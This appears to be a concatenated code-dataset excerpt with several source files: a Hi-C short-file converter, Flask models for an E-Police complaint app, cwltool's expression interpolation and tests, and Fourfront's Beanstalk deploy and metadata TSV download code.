assert (hic.shape[0] == len(theindex)), "ERROR: There are missing valid HIC contacts!"
## Check inter chrom contacts last column
checkix(hic[(hic[colname[-1]].isna())],interquality)
## Reassign last column to inter chrom contacts
hic.loc[interquality.index,colname[-1]] = interquality.values
## check our assignment
assert (hic.dropna().shape[0] == hic.shape[0]), "ERROR: There is missing data in the HIC dataframe!"
## Check final index
checkix(hic,pd.DataFrame(index=theindex))
# In[ ]:
## Generate a short file
if verbose:
print("Generating hic short file: %s"%savepath)
## gather colunm names to be held over
convertix = np.array([0,1,3,4,6])
## Make new column names
newcols = ['buffer1'] + hic.columns[:2].tolist() + ['buffer2','buffer3'] + hic.columns[3:5].tolist() + ['buffer4'] + hic.columns[-1:].tolist()
## Check that their are nine of these
assert len(newcols) == 9, "ERROR: The short file columns were not generated correctly."
## Initialize short dataframe
short = pd.DataFrame(columns=newcols,index=hic.index)
## For each old column name
for c in colname:
## If it's in the new short dataframe assign it
if c in newcols:
short[c] = hic[c]
else:
pass
## Assign zeros to buffer columns 1,2, and 3
short[['buffer1','buffer2','buffer3']] = 0
## and a one to buffer column 4
short[['buffer4']] = 1
## Convert all the columns except those with the chromosome name to integers
## Gather columns to be converted
toint = [c for c in short.columns if c not in [colname[0],colname[3]]]
## Convert to integers
for c in toint:
short[c] = short[c].apply(int)
## Check that we didn't lose any records
checkix(short,hic)
## Save out dataframe
short.to_csv(savepath,sep=outsep,header=False,index=False)
## Print finish
if verbose:
print("Finished :D")
``` |
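For reference, one line of the resulting short file follows the nine-column layout built above (buffer1, Chrom1, Left1, buffer2, buffer3, Chrom2, Left2, buffer4, Quality); the coordinates in this sketch are made up.

```python
row = {
    'buffer1': 0, 'Chrom1': 'chr1', 'Left1': 10000,
    'buffer2': 0, 'buffer3': 0,
    'Chrom2': 'chr1', 'Left2': 250000,
    'buffer4': 1, 'Quality': 12,
}
print(' '.join(str(row[key]) for key in row))  # 0 chr1 10000 0 0 chr1 250000 1 12
```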
{
"source": "4dityarao/E-Police",
"score": 3
} |
#### File: E-Police/flaskblog/models.py
```python
from datetime import datetime
from flaskblog import db,login_manager
from flask_login import UserMixin
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class User(db.Model,UserMixin):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(20), unique=True, nullable=False)
email = db.Column(db.String(120), unique=True, nullable=False)
image_file = db.Column(db.String(20), nullable=False, default='default.jpg')
password = db.Column(db.String(60), nullable=False)
complainants = db.relationship('Complaint', backref='author', lazy=True)
def __repr__(self):
return f"User('{self.username}', '{self.email}', '{self.image_file}')"
class Complaint(db.Model):
id = db.Column(db.Integer, primary_key=True)
complainant = db.Column(db.String(100), nullable=False)
compph = db.Column(db.String, nullable=False)
victim=db.Column(db.String, nullable=False)
victph=db.Column(db.String, nullable=False)
doc=db.Column(db.String,nullable=False)
accused=db.Column(db.String,nullable=False)
description=db.Column(db.Text,nullable=False)
sections=db.Column(db.String,nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
date_posted = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
compadd=db.Column(db.String,nullable=False)
victadd=db.Column(db.String,nullable=False)
def __repr__(self):
return f"Complaint('{self.user_id}', '{self.complainant}')"
``` |
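A sketch of the models in use, assuming an active Flask application context and the `db` session from `flaskblog`; all field values are illustrative only.

```python
from flaskblog import db
from flaskblog.models import User, Complaint

user = User(username='officer1', email='officer1@example.com',
            password='<hashed password>')
db.session.add(user)
db.session.commit()

complaint = Complaint(complainant='A. Citizen', compph='0000000000',
                      victim='B. Citizen', victph='0000000000',
                      doc='2024-01-01', accused='Unknown',
                      description='Test complaint', sections='IPC 379',
                      compadd='Somewhere', victadd='Elsewhere',
                      author=user)
db.session.add(complaint)
db.session.commit()

print(complaint.author.username)  # 'officer1'
print(user.complainants)          # e.g. [Complaint('1', 'A. Citizen')]
```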
{
"source": "4dn-dcic/cwltool",
"score": 2
} |
#### File: cwltool/cwltool/expression.py
```python
from __future__ import absolute_import
import copy
import json
import logging
import re
from typing import Any, AnyStr, Dict, List, Text, Union
from .utils import docker_windows_path_adjust
import six
from six import u
from . import sandboxjs
from .errors import WorkflowException
from .utils import bytes2str_in_dicts
_logger = logging.getLogger("cwltool")
def jshead(engineConfig, rootvars):
# type: (List[Text], Dict[Text, Any]) -> Text
# make sure all the byte strings are converted
# to str in `rootvars` dict.
# TODO: need to make sure the `rootvars dict`
# contains no bytes type in the first place.
if six.PY3:
rootvars = bytes2str_in_dicts(rootvars) # type: ignore
return u"\n".join(engineConfig + [u"var %s = %s;" % (k, json.dumps(v, indent=4)) for k, v in rootvars.items()])
# decode all raw strings to unicode
seg_symbol = r"""\w+"""
seg_single = r"""\['([^']|\\')+'\]"""
seg_double = r"""\["([^"]|\\")+"\]"""
seg_index = r"""\[[0-9]+\]"""
segments = r"(\.%s|%s|%s|%s)" % (seg_symbol, seg_single, seg_double, seg_index)
segment_re = re.compile(u(segments), flags=re.UNICODE)
param_str = r"\((%s)%s*\)$" % (seg_symbol, segments)
param_re = re.compile(u(param_str), flags=re.UNICODE)
JSON = Union[Dict[Any, Any], List[Any], Text, int, float, bool, None]
class SubstitutionError(Exception):
pass
def scanner(scan): # type: (Text) -> List[int]
DEFAULT = 0
DOLLAR = 1
PAREN = 2
BRACE = 3
SINGLE_QUOTE = 4
DOUBLE_QUOTE = 5
BACKSLASH = 6
i = 0
stack = [DEFAULT]
start = 0
while i < len(scan):
state = stack[-1]
c = scan[i]
if state == DEFAULT:
if c == '$':
stack.append(DOLLAR)
elif c == '\\':
stack.append(BACKSLASH)
elif state == BACKSLASH:
stack.pop()
if stack[-1] == DEFAULT:
return [i - 1, i + 1]
elif state == DOLLAR:
if c == '(':
start = i - 1
stack.append(PAREN)
elif c == '{':
start = i - 1
stack.append(BRACE)
else:
stack.pop()
elif state == PAREN:
if c == '(':
stack.append(PAREN)
elif c == ')':
stack.pop()
if stack[-1] == DOLLAR:
return [start, i + 1]
elif c == "'":
stack.append(SINGLE_QUOTE)
elif c == '"':
stack.append(DOUBLE_QUOTE)
elif state == BRACE:
if c == '{':
stack.append(BRACE)
elif c == '}':
stack.pop()
if stack[-1] == DOLLAR:
return [start, i + 1]
elif c == "'":
stack.append(SINGLE_QUOTE)
elif c == '"':
stack.append(DOUBLE_QUOTE)
elif state == SINGLE_QUOTE:
if c == "'":
stack.pop()
elif c == '\\':
stack.append(BACKSLASH)
elif state == DOUBLE_QUOTE:
if c == '"':
stack.pop()
elif c == '\\':
stack.append(BACKSLASH)
i += 1
if len(stack) > 1:
raise SubstitutionError(
"Substitution error, unfinished block starting at position {}: {}".format(start, scan[start:]))
else:
return None
def next_seg(remain, obj): # type: (Text, Any) -> Any
if remain:
m = segment_re.match(remain)
key = None # type: Union[Text, int]
if m.group(0)[0] == '.':
key = m.group(0)[1:]
elif m.group(0)[1] in ("'", '"'):
key = m.group(0)[2:-2].replace("\\'", "'").replace('\\"', '"')
if key:
if isinstance(obj, list) and key == "length" and not remain[m.end(0):]:
return len(obj)
if not isinstance(obj, dict):
raise WorkflowException(" is a %s, cannot index on string '%s'" % (type(obj).__name__, key))
if key not in obj:
raise WorkflowException(" does not contain key '%s'" % key)
else:
try:
key = int(m.group(0)[1:-1])
except ValueError as v:
raise WorkflowException(u(str(v)))
if not isinstance(obj, list):
raise WorkflowException(" is a %s, cannot index on int '%s'" % (type(obj).__name__, key))
if key >= len(obj):
raise WorkflowException(" list index %i out of range" % key)
try:
return next_seg(remain[m.end(0):], obj[key])
except WorkflowException as w:
raise WorkflowException("%s%s" % (m.group(0), w))
else:
return obj
def evaluator(ex, jslib, obj, fullJS=False, timeout=None, force_docker_pull=False, debug=False, js_console=False):
# type: (Text, Text, Dict[Text, Any], bool, int, bool, bool, bool) -> JSON
m = param_re.match(ex)
if m:
if m.end(1)+1 == len(ex) and m.group(1) == "null":
return None
try:
return next_seg(m.group(0)[m.end(1) - m.start(0):-1], obj[m.group(1)])
except Exception as w:
raise WorkflowException("%s%s" % (m.group(1), w))
elif fullJS:
return sandboxjs.execjs(ex, jslib, timeout=timeout, force_docker_pull=force_docker_pull, debug=debug, js_console=js_console)
else:
raise sandboxjs.JavascriptException(
"Syntax error in parameter reference '%s' or used Javascript code without specifying InlineJavascriptRequirement.",
ex)
def interpolate(scan, rootvars,
timeout=None, fullJS=None, jslib="", force_docker_pull=False,
debug=False, js_console=False):
# type: (Text, Dict[Text, Any], int, bool, Union[str, Text], bool, bool, bool) -> JSON
scan = scan.strip()
parts = []
w = scanner(scan)
while w:
parts.append(scan[0:w[0]])
if scan[w[0]] == '$':
e = evaluator(scan[w[0] + 1:w[1]], jslib, rootvars, fullJS=fullJS,
timeout=timeout, force_docker_pull=force_docker_pull,
debug=debug, js_console=js_console)
if w[0] == 0 and w[1] == len(scan):
return e
leaf = json.dumps(e, sort_keys=True)
if leaf[0] == '"':
leaf = leaf[1:-1]
parts.append(leaf)
elif scan[w[0]] == '\\':
e = scan[w[1] - 1]
parts.append(e)
scan = scan[w[1]:]
w = scanner(scan)
parts.append(scan)
return ''.join(parts)
def do_eval(ex, jobinput, requirements, outdir, tmpdir, resources,
context=None, pull_image=True, timeout=None, force_docker_pull=False, debug=False, js_console=False):
# type: (Union[dict, AnyStr], Dict[Text, Union[Dict, List, Text]], List[Dict[Text, Any]], Text, Text, Dict[Text, Union[int, Text]], Any, bool, int, bool, bool, bool) -> Any
runtime = copy.copy(resources)
runtime["tmpdir"] = docker_windows_path_adjust(tmpdir)
runtime["outdir"] = docker_windows_path_adjust(outdir)
rootvars = {
u"inputs": jobinput,
u"self": context,
u"runtime": runtime}
if isinstance(ex, (str, Text)):
fullJS = False
jslib = u""
for r in reversed(requirements):
if r["class"] == "InlineJavascriptRequirement":
fullJS = True
jslib = jshead(r.get("expressionLib", []), rootvars)
break
try:
return interpolate(ex,
rootvars,
timeout=timeout,
fullJS=fullJS,
jslib=jslib,
force_docker_pull=force_docker_pull,
debug=debug,
js_console=js_console)
except Exception as e:
raise WorkflowException("Expression evaluation error:\n%s" % e)
else:
return ex
```
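The parameter-reference path through `interpolate` is easiest to see with the `rootvars` layout that `do_eval` assembles; this sketch assumes cwltool is installed and uses no JavaScript, so `InlineJavascriptRequirement` is not needed.

```python
from cwltool.expression import interpolate

rootvars = {
    "inputs": {"threads": 4, "reads": [{"path": "/data/r1.fastq"}]},
    "self": None,
    "runtime": {"outdir": "/tmp/out"},
}

print(interpolate("$(inputs.threads)", rootvars))        # 4 (typed result)
print(interpolate("-t $(inputs.threads)", rootvars))     # '-t 4'
print(interpolate("$(inputs.reads[0].path)", rootvars))  # '/data/r1.fastq'
print(interpolate("$(runtime.outdir)/result", rootvars)) # '/tmp/out/result'
```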
#### File: cwltool/tests/test_check.py
```python
from __future__ import absolute_import
import unittest
import cwltool.expression as expr
import cwltool.factory
import cwltool.pathmapper
import cwltool.process
import cwltool.workflow
import pytest
from cwltool.main import main
from cwltool.utils import onWindows
from .util import get_data
class TestCheck(unittest.TestCase):
@pytest.mark.skipif(onWindows(),
reason="Instance of Cwltool is used, On windows that invoke a default docker Container")
def test_output_checking(self):
self.assertEquals(main([get_data('tests/wf/badout1.cwl')]), 1)
self.assertEquals(main([get_data('tests/wf/badout2.cwl')]), 1)
self.assertEquals(main([get_data('tests/wf/badout3.cwl')]), 1)
```
#### File: cwltool/tests/test_pack.py
```python
from __future__ import absolute_import
import json
import os
import unittest
from functools import partial
import cwltool.pack
from cwltool.main import print_pack as print_pack
import cwltool.workflow
from cwltool.load_tool import fetch_document, validate_document
from cwltool.main import makeRelative
from cwltool.pathmapper import adjustDirObjs, adjustFileObjs
from .util import get_data
class TestPack(unittest.TestCase):
def test_pack(self):
self.maxDiff = None
document_loader, workflowobj, uri = fetch_document(
get_data("tests/wf/revsort.cwl"))
document_loader, avsc_names, processobj, metadata, uri = validate_document(
document_loader, workflowobj, uri)
packed = cwltool.pack.pack(document_loader, processobj, uri, metadata)
with open(get_data("tests/wf/expect_packed.cwl")) as f:
expect_packed = json.load(f)
adjustFileObjs(packed, partial(makeRelative,
os.path.abspath(get_data("tests/wf"))))
adjustDirObjs(packed, partial(makeRelative,
os.path.abspath(get_data("tests/wf"))))
self.assertIn("$schemas", packed)
del packed["$schemas"]
del expect_packed["$schemas"]
self.assertEqual(expect_packed, packed)
def test_pack_missing_cwlVersion(self):
"""Test to ensure the generated pack output is not missing
the `cwlVersion` in case of single tool workflow and single step workflow"""
# Since diff is longer than 3174 characters
self.maxDiff = None
# Testing single tool workflow
document_loader, workflowobj, uri = fetch_document(
get_data("tests/wf/hello_single_tool.cwl"))
document_loader, avsc_names, processobj, metadata, uri = validate_document(
document_loader, workflowobj, uri)
# generate pack output dict
packed = json.loads(print_pack(document_loader, processobj, uri, metadata))
self.assertEqual('v1.0', packed["cwlVersion"])
# Testing single step workflow
document_loader, workflowobj, uri = fetch_document(
get_data("tests/wf/hello-workflow.cwl"))
document_loader, avsc_names, processobj, metadata, uri = validate_document(
document_loader, workflowobj, uri)
# generate pack output dict
packed = json.loads(print_pack(document_loader, processobj, uri, metadata))
self.assertEqual('v1.0', packed["cwlVersion"])
``` |
{
"source": "4dn-dcic/fourfron",
"score": 2
} |
#### File: fourfron/deploy/deploy_beanstalk.py
```python
import os
from time import sleep
import sys
import subprocess
import hashlib
import argparse
from datetime import datetime
def tag(name):
subprocess.check_output(['git', 'tag', name, '-m', 'version created for staging deploy'])
subprocess.check_output(['git', 'push', 'origin-travis', name])
def merge(source, merge_to):
res1 = subprocess.check_output(['git', 'status']).decode('utf-8').strip()
print("status on master is: " + res1)
subprocess.check_output(['git', 'stash'])
subprocess.check_output(
['git', 'checkout', merge_to])
res = subprocess.check_output(['git', 'status']).decode('utf-8').strip()
print("status on prod is: " + res)
res2 = subprocess.check_output(
['git', 'merge', source, '-m', 'merged']).decode('utf-8').strip()
print(res2)
subprocess.check_output(
['git', 'push', 'origin-travis', merge_to]).decode('utf-8').strip()
subprocess.check_output(['git', 'stash', 'pop'])
def get_git_version():
version = os.environ.get("TRAVIS_COMMIT", "")[:7]
if not version:
version = subprocess.check_output(
['git', '-C', os.path.dirname(__file__), 'describe']).decode('utf-8').strip()
version = version[:7]
diff = subprocess.check_output(
['git', '-C', os.path.dirname(__file__), 'diff', '--no-ext-diff'])
if diff:
version += '-patch' + hashlib.sha1(diff).hexdigest()[:7]
return "v-" + version
def update_version(version, branch):
filename = 'buildout.cfg'
regex = 's/encoded_version.*/encoded_version = %s/' % (version)
print("updated buildout.cfg with version", version)
subprocess.check_output(
['sed', '-i', regex, filename])
commit_with_previous_msg(filename, branch)
def commit_with_previous_msg(filename, branch):
print("adding file to git")
subprocess.check_output(
['git', 'add', filename])
msg = parse(previous_git_commit())
print("git commit -m " + msg)
subprocess.check_output(
['git', 'commit', '-m', 'version bump + ' + msg])
subprocess.check_output(
['git', 'push', 'origin-travis', branch])
def previous_git_commit():
return subprocess.check_output(
['git', 'log', '-1']
).decode('utf-8').strip()
def parse(commit):
author, msg = "", ""
# parse up some commit lines
commit_lines = commit.split('\n')
author = commit_lines[1].split(":")[1].strip()
msg = " ".join(l.strip() for l in commit_lines[3:] if l)
return "%s - %s" % (author, msg)
def deploy(deploy_to=None):
'''
run eb deploy and show the output
'''
print("start deployment to elastic beanstalk deploy to is %s" % str(deploy_to))
wait = [20, 40, 60, 120, 120, 120, 120]
for time in wait:
try:
if not deploy_to:
p = subprocess.Popen(['eb', 'deploy'], stderr=subprocess.STDOUT, stdout=subprocess.PIPE)
else:
p = subprocess.Popen(['eb', 'deploy', deploy_to], stderr=subprocess.STDOUT, stdout=subprocess.PIPE)
except Exception:
# we often get errors due to timeouts
sleep(time)
else:
break
time_started = datetime.now()
print('Started deployment at {}. Waiting 2 minutes & exiting.'.format(time_started.strftime('%H:%M:%S:%f')))
sleep(120)
# MAYBE TODO: Setup new thread and listen re: "Deploying new version to instance(s).". Exit if this occurs before 2min.
#
#while True:
# out = p.stdout.readline()
# out = out.decode('utf-8')
# curr_time = datetime.now()
# if out != '':
# sys.stdout.write('[' + curr_time.strftime('%H:%M:%S:%f') + '] ' + out)
# sys.stdout.flush()
# if ("Deploying new version to instance(s)." in out) or (time_started + timedelta(minutes=2) <= curr_time): # 2 min time limit
# print('Killing sub-process & exiting.')
# sleep(5)
# p.kill()
# break
# if out == '' and p.poll() is not None:
# print('Deploy sub-process complete. Exiting.')
# break
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="update version if relevant and deploy"
)
args = parser.parse_args()
branch = os.environ.get("TRAVIS_BRANCH")
merge_to = os.environ.get("tibanna_merge", "").strip()
deploy_to = os.environ.get("tibanna_deploy", "").strip()
try:
if deploy_to in ['fourfront-staging', 'fourfront-webprod', 'fourfront-webprod2']:
print("deploy to staging")
ver = get_git_version()
# checkout correct branch
print("checkout master")
subprocess.check_output(
['git', 'checkout', branch])
print("update version")
update_version(ver, branch)
if merge_to:
print("merge from %s to %s" % (branch, merge_to))
merge(branch, merge_to)
print("tag it")
tag(ver)
except Exception as e:
# this can all go wrong if somebody pushes during the build
# or what not, in which case we just won't update the tag / merge
print("got the following expection but we will ignore it")
print(e)
print("switching back to source branch")
subprocess.check_output(
['git', 'checkout', branch])
print("now let's deploy")
deploy(deploy_to)
```
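For reference, `parse` above assumes the default `git log -1` layout: the author on the second line and the commit message starting on the fourth. A minimal standalone sketch of that transformation (the sample commit text below is hypothetical):

```python
# Hypothetical `git log -1` output; real output depends on the repository state.
sample_commit = (
    "commit 0123456789abcdef0123456789abcdef01234567\n"
    "Author: Jane Doe <jane@example.org>\n"
    "Date:   Mon Jan 1 00:00:00 2024 +0000\n"
    "\n"
    "    Fix search indexing\n"
    "\n"
    "    Also bump dependencies\n"
)

def parse_commit(commit):
    # Same line-oriented parsing as parse() above: author from line 2,
    # message joined from line 4 onward, skipping blank lines.
    lines = commit.split('\n')
    author = lines[1].split(":")[1].strip()
    msg = " ".join(l.strip() for l in lines[3:] if l)
    return "%s - %s" % (author, msg)

print(parse_commit(sample_commit))
# prints: Jane Doe <jane@example.org> - Fix search indexing Also bump dependencies
```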
#### File: fourfron/deploy/generate_production_ini.py
```python
import os
from dcicutils.deployment_utils import BasicLegacyFourfrontIniFileManager
class FourfrontDeployer(BasicLegacyFourfrontIniFileManager):
_MY_DIR = os.path.dirname(__file__)
TEMPLATE_DIR = os.path.join(_MY_DIR, "ini_files")
PYPROJECT_FILE_NAME = os.path.join(os.path.dirname(_MY_DIR), "pyproject.toml")
def main():
FourfrontDeployer.main()
if __name__ == '__main__':
main()
```
#### File: src/encoded/batch_download.py
```python
from collections import OrderedDict
from pyramid.compat import bytes_
from pyramid.httpexceptions import (
HTTPBadRequest,
HTTPMovedPermanently
)
from base64 import b64decode
from pyramid.view import view_config
from pyramid.response import Response
from snovault import TYPES
from snovault.util import simple_path_ids, debug_log
from itertools import chain
from urllib.parse import (
parse_qs,
urlencode,
)
from .search import (
iter_search_results,
build_table_columns,
get_iterable_search_results,
make_search_subreq
)
import csv
import io
import json
from datetime import datetime
import structlog
log = structlog.getLogger(__name__)
def includeme(config):
config.add_route('batch_download', '/batch_download/{search_params}')
config.add_route('metadata', '/metadata/')
config.add_route('metadata_redirect', '/metadata/{search_params}/{tsv}')
config.add_route('peak_metadata', '/peak_metadata/{search_params}/{tsv}')
config.add_route('report_download', '/report.tsv')
config.scan(__name__)
EXP_SET = 0
EXP = 1
FILE = 2
FILE_ONLY = 3
# includes concatenated properties
# mapping structure: column title -> (item type, [field names], remove duplicates)
TSV_MAPPING = OrderedDict([
('File Download URL', (FILE, ['href'], True)),
('Experiment Set Accession', (EXP_SET, ['accession'], True)),
('Experiment Accession', (EXP, ['accession'], True)),
('Experiment Set Accession ', (FILE_ONLY, ['experiment_sets.accession'], True)), #do not remove trailing whitespace of the key
('Experiment Accession ', (FILE_ONLY, ['experiments.accession'], True)), #do not remove trailing whitespace of the key
('File Accession', (FILE, ['accession'], True)),
('Size (MB)', (FILE, ['file_size'], True)),
('md5sum', (FILE, ['md5sum'], True)),
('File Type', (FILE, ['file_type'], True)),
('File Format', (FILE, ['file_format.display_title'], True)),
('Bio Rep No', (EXP_SET, ['replicate_exps.bio_rep_no'], True)),
('Tech Rep No', (EXP_SET, ['replicate_exps.tec_rep_no'], True)),
('Biosource Type', (EXP, ['biosample.biosource.biosource_type'], True)),
('Organism', (EXP, ['biosample.biosource.individual.organism.name'], True)),
('Related File Relationship', (FILE, ['related_files.relationship_type'], False)),
('Related File', (FILE, ['related_files.file.accession'], False)),
('Paired End', (FILE, ['paired_end'], True)),
('Set Status', (EXP_SET, ['status'], True)),
('File Status', (FILE, ['status'], True)),
('Publication', (EXP_SET, ['produced_in_pub.short_attribution'], True)),
('Experiment Type', (FILE, ['track_and_facet_info.experiment_type'], True)),
('Replicate Info', (FILE, ['track_and_facet_info.replicate_info'], True)),
('Assay Details', (FILE, ['track_and_facet_info.assay_info'], True)),
('Biosource', (FILE, ['track_and_facet_info.biosource_name'], True)),
('Dataset', (FILE, ['track_and_facet_info.dataset'], True)),
('Condition', (FILE, ['track_and_facet_info.condition'], True)),
('In Experiment As', (FILE, ['track_and_facet_info.experiment_bucket'], True)),
('Project', (EXP_SET, ['award.project'], True)),
('Generating Lab', (FILE, ['track_and_facet_info.lab_name'], True)),
('Experimental Lab', (FILE, ['track_and_facet_info.experimental_lab'], True)),
('Contributing Lab', (FILE, ['contributing_labs.display_title'], True)),
('Notes', (FILE, ['notes_to_tsv'], True)),
('Open Data URL', (FILE, ['open_data_url'], True)),
#('UUID', (FILE, ['uuid'])),
#('Biosample life stage', ['replicates.library.biosample.life_stage']),
#('Biosample sex', ['replicates.library.biosample.sex']),
#('Biosample organism', ['replicates.library.biosample.organism.scientific_name']),
#('Biosample treatments', ['replicates.library.biosample.treatments.treatment_term_name']),
#('Biosample subcellular fraction term name', ['replicates.library.biosample.subcellular_fraction_term_name']),
#('Biosample phase', ['replicates.library.biosample.phase']),
#('Biosample synchronization stage', ['replicates.library.biosample.fly_synchronization_stage',
# 'replicates.library.biosample.worm_synchronization_stage',
# 'replicates.library.biosample.post_synchronization_time',
# 'replicates.library.biosample.post_synchronization_time_units']),
#('Experiment target', ['target.name']),
#('Antibody accession', ['replicates.antibody.accession']),
#('Library made from', ['replicates.library.nucleic_acid_term_name']),
#('Library depleted in', ['replicates.library.depleted_in_term_name']),
#('Library extraction method', ['replicates.library.extraction_method']),
#('Library lysis method', ['replicates.library.lysis_method']),
#('Library crosslinking method', ['replicates.library.crosslinking_method']),
#('Date Created', ['experiments_in_set.files.date_created']),
#('Project', ['award.project']),
#('RBNS protein concentration', ['files.replicate.rbns_protein_concentration', 'files.replicate.rbns_protein_concentration_units']),
#('Library fragmentation method', ['files.replicate.library.fragmentation_method']),
#('Library size range', ['files.replicate.library.size_range']),
#('Biosample Age', ['files.replicate.library.biosample.age_display']),
#('Biological replicate(s)', ['files.biological_replicates']),
#('Technical replicate', ['files.replicate.technical_replicate_number']),
#('Read length', ['files.read_length']),
#('Run type', ['files.run_type']),
#('Paired with', ['experiments_in_set.files.paired_with']),
#('Derived from', ['files.derived_from.accession']),
#('Assembly', ['files.assembly']),
#('Platform', ['files.platform.title'])
])
EXTRA_FIELDS = {
EXP_SET : ['replicate_exps.replicate_exp.accession', 'lab.correspondence.contact_email'],
EXP : ['reference_files.accession', 'reference_files.href', 'reference_files.file_format.display_title', 'reference_files.file_type', 'reference_files.md5sum', 'reference_files.file_size', 'reference_files.status', 'reference_files.lab.display_title', 'reference_files.contributing_labs.display_title'],
FILE : ['extra_files.href', 'extra_files.file_format', 'extra_files.md5sum', 'extra_files.use_for', 'extra_files.file_size', 'file_classification']
}
def get_file_uuids(result_dict):
file_uuids = []
for item in result_dict['@graph']:
for file in item['files']:
file_uuids.append(file['uuid'])
return list(set(file_uuids))
def get_biosample_accessions(file_json, experiment_json):
for f in experiment_json['files']:
if file_json['uuid'] == f['uuid']:
accession = f.get('replicate', {}).get('library', {}).get('biosample', {}).get('accession')
if accession:
return accession
accessions = []
for replicate in experiment_json.get('replicates', []):
accession = replicate['library']['biosample']['accession']
accessions.append(accession)
return ', '.join(list(set(accessions)))
def get_peak_metadata_links(request):
if request.matchdict.get('search_params'):
search_params = request.matchdict['search_params']
else:
search_params = request.query_string
peak_metadata_tsv_link = '{host_url}/peak_metadata/{search_params}/peak_metadata.tsv'.format(
host_url=request.host_url,
search_params=search_params
)
peak_metadata_json_link = '{host_url}/peak_metadata/{search_params}/peak_metadata.json'.format(
host_url=request.host_url,
search_params=search_params
)
return [peak_metadata_tsv_link, peak_metadata_json_link]
class DummyFileInterfaceImplementation(object):
def __init__(self):
self._line = None
def write(self, line):
self._line = line
def read(self):
return self._line
@view_config(route_name='peak_metadata', request_method='GET')
@debug_log
def peak_metadata(context, request):
param_list = parse_qs(request.matchdict['search_params'])
param_list['field'] = []
header = ['assay_term_name', 'coordinates', 'target.label', 'biosample.accession', 'file.accession', 'experiment.accession']
param_list['limit'] = ['all']
path = '/region-search/?{}&{}'.format(urlencode(param_list, True),'referrer=peak_metadata')
results = request.embed(path, as_user=True)
uuids_in_results = get_file_uuids(results)
rows = []
json_doc = {}
for row in results['peaks']:
if row['_id'] in uuids_in_results:
file_json = request.embed(row['_id'])
experiment_json = request.embed(file_json['dataset'])
for hit in row['inner_hits']['positions']['hits']['hits']:
data_row = []
coordinates = '{}:{}-{}'.format(hit['_index'], hit['_source']['start'], hit['_source']['end'])
file_accession = file_json['accession']
experiment_accession = experiment_json['accession']
assay_name = experiment_json['assay_term_name']
target_name = experiment_json.get('target', {}).get('label') # not all experiments have targets
biosample_accession = get_biosample_accessions(file_json, experiment_json)
data_row.extend([assay_name, coordinates, target_name, biosample_accession, file_accession, experiment_accession])
rows.append(data_row)
                    if assay_name not in json_doc:
                        json_doc[assay_name] = []
                    # record every hit, including the first one seen for an assay
                    json_doc[assay_name].append({
'coordinates': coordinates,
'target.name': target_name,
'biosample.accession': list(biosample_accession.split(', ')),
'file.accession': file_accession,
'experiment.accession': experiment_accession
})
if 'peak_metadata.json' in request.url:
return Response(
content_type='text/plain',
body=json.dumps(json_doc),
content_disposition='attachment;filename="%s"' % 'peak_metadata.json'
)
fout = io.StringIO()
writer = csv.writer(fout, delimiter='\t')
writer.writerow(header)
writer.writerows(rows)
return Response(
content_type='text/tsv',
body=fout.getvalue(),
content_disposition='attachment;filename="%s"' % 'peak_metadata.tsv'
)
# Local flag. TODO: Just perform some request to this endpoint after bin/pserve as part of deploy script.
endpoints_initialized = {
"metadata" : False
}
@view_config(route_name='metadata', request_method=['GET', 'POST'])
@debug_log
def metadata_tsv(context, request):
'''
Accepts a POST Form request (NOT JSON) with 'accession_triples' (list of 3-item arrays containing ExpSet Accession, Exp Accession, File Accession)
Run search sub-request and serves any in-accession_triples File from search result as a file row in streamed metadata.tsv file.
Alternatively, can accept a GET request wherein all files from ExpSets matching search query params are included.
'''
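    # Example POST form fields (accessions below are hypothetical; both values are JSON-encoded strings):
    #   accession_triples=[["4DNESAAAAAAA", "4DNEXAAAAAA1", "4DNFIAAAAAA1"]]
    #   download_file_name="metadata_2020-01-01.tsv"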
search_params = dict(request.GET) # Must use request.GET to get URI query params only (exclude POST params, etc.)
# If conditions are met (equal number of accession per Item type), will be a list with tuples: (ExpSetAccession, ExpAccession, FileAccession)
accession_triples = None
filename_to_suggest = None
post_body = { "accession_triples" : None, "download_file_name" : None }
if request.POST.get('accession_triples') is not None: # Was submitted as a POST form JSON variable. Workaround to not being able to download files through AJAX.
try:
post_body['accession_triples'] = json.loads(request.POST.get('accession_triples'))
post_body['download_file_name'] = json.loads(request.POST.get('download_file_name')) # Note: Even though text string is requested, POST req should wrap it in JSON.stringify() else this fails.
except Exception:
pass
if isinstance(post_body['accession_triples'], list) and len(post_body['accession_triples']) > 0:
if isinstance(post_body['accession_triples'][0], list): # List of arrays
accession_triples = [ (acc_list[0], acc_list[1], acc_list[2] ) for acc_list in post_body['accession_triples'] ]
else: # List of dicts { 'accession', 'experiments_in_set.accession', ... } --- DEPRECATED
accession_triples = [ (acc_dict.get('accession', 'NONE'), acc_dict.get('experiments_in_set.accession', 'NONE'), acc_dict.get('experiments_in_set.files.accession', 'NONE') ) for acc_dict in post_body['accession_triples'] ]
filename_to_suggest = post_body.get('download_file_name', None)
if 'referrer' in search_params:
search_path = '/{}/'.format(search_params.pop('referrer')[0])
else:
search_path = '/search/'
search_params['field'] = []
search_params['sort'] = ['accession']
search_params['type'] = search_params.get('type', 'ExperimentSetReplicate')
header = []
    def add_field_to_search_params(itemType, param_field):
if search_params['type'][0:13] == 'ExperimentSet':
if itemType == EXP_SET:
search_params['field'].append(param_field)
elif itemType == EXP:
search_params['field'].append('experiments_in_set.' + param_field)
elif itemType == FILE:
search_params['field'].append('experiments_in_set.files.' + param_field)
search_params['field'].append('experiments_in_set.processed_files.' + param_field)
search_params['field'].append('experiments_in_set.other_processed_files.files.' + param_field)
search_params['field'].append('processed_files.' + param_field)
search_params['field'].append('other_processed_files.files.' + param_field)
elif search_params['type'][0:4] == 'File' and search_params['type'][4:7] != 'Set':
if itemType == EXP_SET:
search_params['field'].append('experiment_set.' + param_field)
elif itemType == EXP:
search_params['field'].append('experiment.' + param_field)
elif itemType == FILE or itemType == FILE_ONLY:
search_params['field'].append(param_field)
else:
raise HTTPBadRequest("Metadata can only be retrieved currently for Experiment Sets or Files. Received \"" + search_params['type'] + "\"")
for prop in TSV_MAPPING:
if search_params['type'][0:4] == 'File' and search_params['type'][4:7] != 'Set':
if TSV_MAPPING[prop][0] == FILE or TSV_MAPPING[prop][0] == FILE_ONLY:
header.append(prop)
elif TSV_MAPPING[prop][0] != FILE_ONLY:
